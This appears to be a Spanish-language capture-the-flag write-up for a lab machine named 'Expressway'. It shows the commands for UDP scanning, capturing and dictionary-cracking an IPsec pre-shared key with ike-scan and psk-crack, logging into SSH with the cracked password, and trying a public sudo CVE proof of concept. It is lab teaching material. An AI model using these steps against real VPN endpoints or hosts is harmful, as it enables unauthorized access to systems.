Expressway

Escaneo por TCP pero solo encontramos el puerto 22 (SSH)

UDP - 500

Hacemos el escaneo por UDP:

nmap -sU 10.10.11.87

Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-20 21:49 CEST
Nmap scan report for 10.10.11.87
Host is up (1.1s latency).
Not shown: 996 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike
Nmap done: 1 IP address (1 host up) scanned in 1135.98 seconds

Por tanto, si ves que el puerto 500/UDP está abierto en un escaneo, es una fuerte señal de que el sistema está ejecutando una VPN basada en IPsec que usa ISAKMP para la negociación de claves y seguridad.

Escaneo con ike-scan en Main Mode

ike-scan -M expressway.htb

Este comando usa la herramienta ike-scan para realizar un escaneo en Main Mode en la máquina expressway.htb. Main Mode es un modo de intercambio de claves IKE donde se negocian parámetros de seguridad. El objetivo es identificar información como el usuario y el método de autenticación de la VPN.

Escaneo con ike-scan en Aggressive Mode

ike-scan -A expressway.htb

Este comando realiza un escaneo en Aggressive Mode. En este modo, se envían más mensajes para obtener información más detallada rápidamente. Identifica el usuario válido ike@expressway.htb, que se usa para la autenticación en la VPN.

Crackear el PSK usando RockYou

ike-scan -A --pskcrack=out.txt expressway.htb

Este comando usa el archivo out.txt generado por el escaneo en Aggressive Mode y lo pasa a un crackeo del PSK (Pre-Shared Key) utilizando un ataque de diccionario. El PSK es la clave precompartida que se usa para autenticar conexiones VPN.

Crackear el PSK

psk-crack -d /usr/share/wordlists/rockyou.txt out.txt

Este comando usa la wordlist rockyou.txt para realizar un ataque de diccionario sobre el archivo out.txt y obtener el PSK. El resultado es la contraseña freakingrockstarontheroad.

Acceso SSH con el PSK

ssh ike@expressway.htb
freakingrockstarontheroad

Comprobación de la versión de Sudo para explotación

ike@expressway:~$ sudo -V 
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
ike@expressway:~$

Este comando te muestra la versión de sudo instalada en el sistema. En este caso, muestra que la versión de sudo es 1.9.17, que es vulnerable a varias vulnerabilidades conocidas, como CVE-2025-32462 y CVE-2025-32463.

CVE-2025-32462-POC/CVE-2025-32462.sh at main · cyberpoul/CVE-2025-32462-POCGitHub

ike@expressway:/tmp$ ./CVE-2025-32462.sh 
[+] Testing for CVE-2025-32462 bypass via 'sudo -h'...
Password: 
[-] Target not vulnerable or sudoers configuration not exploitable.
ike@expressway:/tmp$ grep -R ".expressway.htb" /var/log/ 2>/dev/null␍
bash: /dev/null␍: Permission denied
ike@expressway:/tmp$ grep -R ".expressway.htb" /var/log/ 2>/dev/null
/var/log/squid/access.log.1:1753229688.902      0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html

PreviousTemporada 9 NextPro Labs

Last updated 4 months ago

hashtagUDP - 500

hashtagEscaneo con ike-scan en Main Mode

hashtagEscaneo con ike-scan en Aggressive Mode

hashtagCrackear el PSK usando RockYou

hashtagCrackear el PSK

hashtagAcceso SSH con el PSK

hashtagComprobación de la versión de Sudo para explotación